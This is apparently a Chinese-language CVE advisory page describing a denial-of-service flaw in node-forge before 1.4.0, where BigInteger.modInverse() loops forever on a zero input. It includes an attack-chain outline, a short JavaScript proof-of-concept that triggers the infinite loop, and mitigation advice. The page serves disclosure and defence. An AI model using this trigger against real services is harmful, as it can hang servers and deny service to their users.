CVE-2026-33891 CVSS 7.5 高危

CVE-2026-33891 node-forge 拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33891

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

node-forge

漏洞概述

node-forge库在1.4.0版本之前存在一个拒绝服务漏洞。该漏洞源于BigInteger.modInverse()函数在处理零值输入时，会陷入无限循环。攻击者可利用此缺陷导致目标进程挂起并消耗全部CPU资源。

技术细节

该漏洞存在于node-forge库包含的jsbn库中的BigInteger.modInverse()函数。node-forge是一个用于在JavaScript中实现传输层安全（TLS）的工具库。漏洞的根本原因在于扩展欧几里得算法的实现逻辑缺陷。当modInverse()函数被调用且输入参数为零时，算法无法找到模逆元，且代码未对此边界条件进行有效检查。这导致算法进入无法退出的死循环状态。由于Node.js的单线程事件循环机制，这种无限循环会完全阻塞主线程，导致应用程序无法响应其他请求，进而造成严重的拒绝服务（DoS）。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用使用了存在漏洞的node-forge库（版本<1.4.0）。

STEP 2

载荷构造

攻击者构造特定的数据包或输入，旨在触发BigInteger.modInverse()函数，并将其参数设置为0。

STEP 3

漏洞利用

攻击者向目标服务器发送恶意请求，迫使服务器处理包含零值的modInverse运算。

STEP 4

拒绝服务

服务器进程因无限循环而挂起，CPU占用率达到100%，无法处理正常业务请求。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

const forge = require('node-forge');

// Create a BigInteger with value 0 to trigger the vulnerability
var zero = new forge.jsbn.BigInteger('0');
var n = new forge.jsbn.BigInteger('123');

try {
    // Call modInverse with zero, causing an infinite loop and CPU exhaustion
    var result = zero.modInverse(n);
    console.log(result);
} catch (e) {
    console.log(e);
}

影响范围

node-forge < 1.4.0

防御指南

临时缓解措施

在调用modInverse函数之前，实施严格的输入验证以过滤零值输入。若无法立即升级，建议在应用网关层实施限流策略，以减轻攻击对CPU资源的消耗。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表